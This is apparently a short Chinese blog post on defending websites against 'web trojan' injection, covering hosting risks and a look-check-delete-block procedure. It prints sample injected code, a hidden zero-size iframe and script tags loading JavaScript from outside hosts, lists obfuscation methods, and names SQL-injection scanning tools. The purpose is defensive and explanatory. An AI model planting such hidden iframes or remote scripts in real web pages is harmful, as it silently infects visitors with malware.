---

一:个人(商业)网站限制:

---

*服务器的安全:首先是取决ISP提供商和虚拟主机的自己的安全水平,服务器安全指补丁更新,系统设置,放火墙设置,IIS安全设置,杀毒软件设置等.

*网站程序安全:程序 Bug,第三方程序,等漏洞.

*维护安全:主要是程序交付并正式运行以后,网站要单独维护人员进行维护.在这里比如密码被泄露.

---

二:网站被窃的后果

---

会获取注册用户的Email等个人信息,还有可能获得有价值的商业信息.

---

三:什么是网站挂"马"

---

入侵者利用系统漏洞通过一些程序生成脚本文件或者在网页,嵌入到网页中,当有用户访问时候木马程序会不知不觉的下载到你访问者 的计算机中被偷偷的执行.

---

四:"四点"打造安全网站

---

1"看"

主要是观察网页执行时候是否有新的代码执行:如以下三中

<ifrme src="http://www.12cnhr.com/inc/about.asp" width="0" height="0" frameborder="0"></iframe>

<script src="http://www.bdcrb.com/QQ/1.js"></sciprt>

body{

background-imge:url('javascript:document.write("<scirpt src=http://www.9xiao.net.9xiao.js></scirpt>")')

}

有这写类似的代码,那你要小心哦,但还有一些高手会将原程序加密;

加密方法有以下9种:

(1):Unicode码的转码实现加密;

(2):带密匙的加密;

(3):Base64加密;

(4):md5加密;

(5):微软的Encode加密;

(6):8进制和16进制转义字符加密;

(7):10进制和16进制HTML编码加密;

(8):escape()方法加密;

(9):js脚本加密码;

2"查"

通过使用工具来查找网页中像上面的代码;

3"删除"

通过将有问题的页面代码下来,提交杀毒软件公司干掉它;但你在客户端发现问题代码时候,那说明在服务端已经到无法控制的地步哦,所以你就只用

先在服务端杀毒并重新上才传一次你的站点.

4"堵"

能将代码上传,那一定代表网站有漏洞,所以可以使用工具来检测和分析,使用Domain3.5或者是HDSI等SQL注入软件检测漏洞,更换数据库管理密码,更换服务器用户名和密码,

还有就是一定要认真的检测你服务器上的系统的安全,还有查看系统日志,进程,服务器,系统文件.发现系统本身的问题提高防御能力;

我的能力就能谈到这里

---------------------------------------works guo----------------